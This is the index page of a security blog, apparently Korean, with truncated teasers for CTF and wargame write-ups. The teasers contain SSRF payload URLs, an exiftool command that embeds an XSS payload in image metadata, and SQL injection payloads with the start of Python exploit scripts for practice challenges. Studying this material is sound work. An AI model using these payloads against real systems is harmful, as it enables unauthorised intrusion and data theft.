$ whoami

Home

분류 전체보기 (116)

Home

분류 전체보기 (116)

블로그 내 검색

CONTACT

HACKINTOANETWORK
WEB APPLICATION BUG HUNTER, PENETRATION TESTER

전체 글 (116)

CTF/Incognito 4.0
[Incognito 4.0] massive
To summarize this CTF challenge, it could be solved by performing a NoSQL injection attack. The challenge provided a login and registration feature, as well as a functionality to check the existence of an email and whether an account had admin privileges. The ultimate goal of the challenge was to log in with an admin account, so I had to find an account with "isAdmin" set to true. Payload import..

2023. 2. 19.

CTF/Incognito 4.0
[Incognito 4.0] get flag2
This CTF challenge is an SSRF challenge with some additional filtering compared to the "get flag1" challenge that was previously solved. The challenge provides a URL form where a user can input a URL, and the goal is to bypass the filtering and trigger an SSRF attack. Payload http://0x7f.0x00.0x00.0x01:9001/flag.txt The payload used to trigger the SSRF attack is the URL "http://0x7f.0x00.0x00.0x..

2023. 2. 19.

CTF/Incognito 4.0
[Incognito 4.0] get flag 1
This CTF challenge is a simple SSRF challenge When you access the challenge, there is a URL form where you can input a URL. Payload http://0.0.0.0:9001/flag.txt Exploit By entering "http://0.0.0.0:9001/flag.txt" into the URL form, you can trigger an SSRF vulnerability. FLAG : ictf{l0c4l_byp4$$_323theu0a9}

2023. 2. 19.

CTF/DiceCTF 2023
[DiceCTF 2023] recursive-csp
이 문제는 CRC32B 해시 알고리즘 기반의 CSP를 우회하여 RXSS를 트리거 하는 것이 핵심이다. 문제의 소스코드는 다음과 같다.

2023. 2. 6.

Exploit/Exploit
[XSS] File upload XSS
XSS via filename Node.js third-party modules disclosed on HackerOne: [tianma-static]... hackerone.com create filename start tianma-static xss fired XSS via Metadata Shopify disclosed on HackerOne: XSS Stored via Upload avatar PNG... hackerone.com Exiftool를 사용하여 메타데이터에 xss 페이로드 쓰기 파일에서 exif 메타데이터가 제거되지 않은 경우에 발생할 수 있다. exiftool command exiftool -Comment="\">" xss_comment_exif_metadata_double_quot..

2023. 2. 2.

Exploit/Bug Bounty
[Bug Bounty] Daum Cafe, Tistory Stored XSS PoC
보호되어 있는 글입니다. 비밀번호를 입력해야 내용을 볼 수 있어요.

2023. 1. 24.

Wargame/Webhacking.kr
[Webhacking.kr] RegexMaster
보호되어 있는 글입니다. 비밀번호를 입력해야 내용을 볼 수 있어요.

2022. 12. 13.

Wargame/Lord of SQL Injection
[Lord of SQL Injection] poltergeist
Prob Payload pw=' union select sql from sqlite_master limit 1,1--%20 pw=' union select flag_0876285c from flag_70c81d99--%20 Exploit import requests from bs4 import BeautifulSoup url = "https://los.rubiya.kr/chall/poltergeist_a62c7abc7e6ce0080dbf0e14a07d1f1d.php?" cookie = {'PHPSESSID':'o8k4eis6nm0q904ajkf4t2aiva'} def tbl_name_and_col_name(): query = "pw=' union select sql from sqlite_master li..

2022. 10. 25.

Wargame/Lord of SQL Injection
[Lord of SQL Injection] banshee
Prob Payload pw=' or id='admin' and length(pw)=8--%20 pw=' or id='admin' and unicode(substr(pw,1,1))=48--%20 Exploit import requests import string url = "https://los.rubiya.kr/chall/banshee_ece938c70ea2419a093bb0be9f01a7b1.php?" cookie = {'PHPSESSID':'l76vhg3a57sh6gnch2itdmvsoj'} def pw_length(): pw_len = 0 while True: pw_len += 1 query = "pw=' or id='admin' and length(pw)={}-- ".format(pw_len) ..

2022. 10. 25.

이전

1 2 3 4 ··· 13

다음

전체 글 보기

Tistory 로그인

Tistory 로그아웃

로그아웃 글쓰기 관리

Today 0

Total 13,024

Powered by hackintoanetwork

Designed by Nana

블로그 이미지

hackintoanetwork

티스토리툴바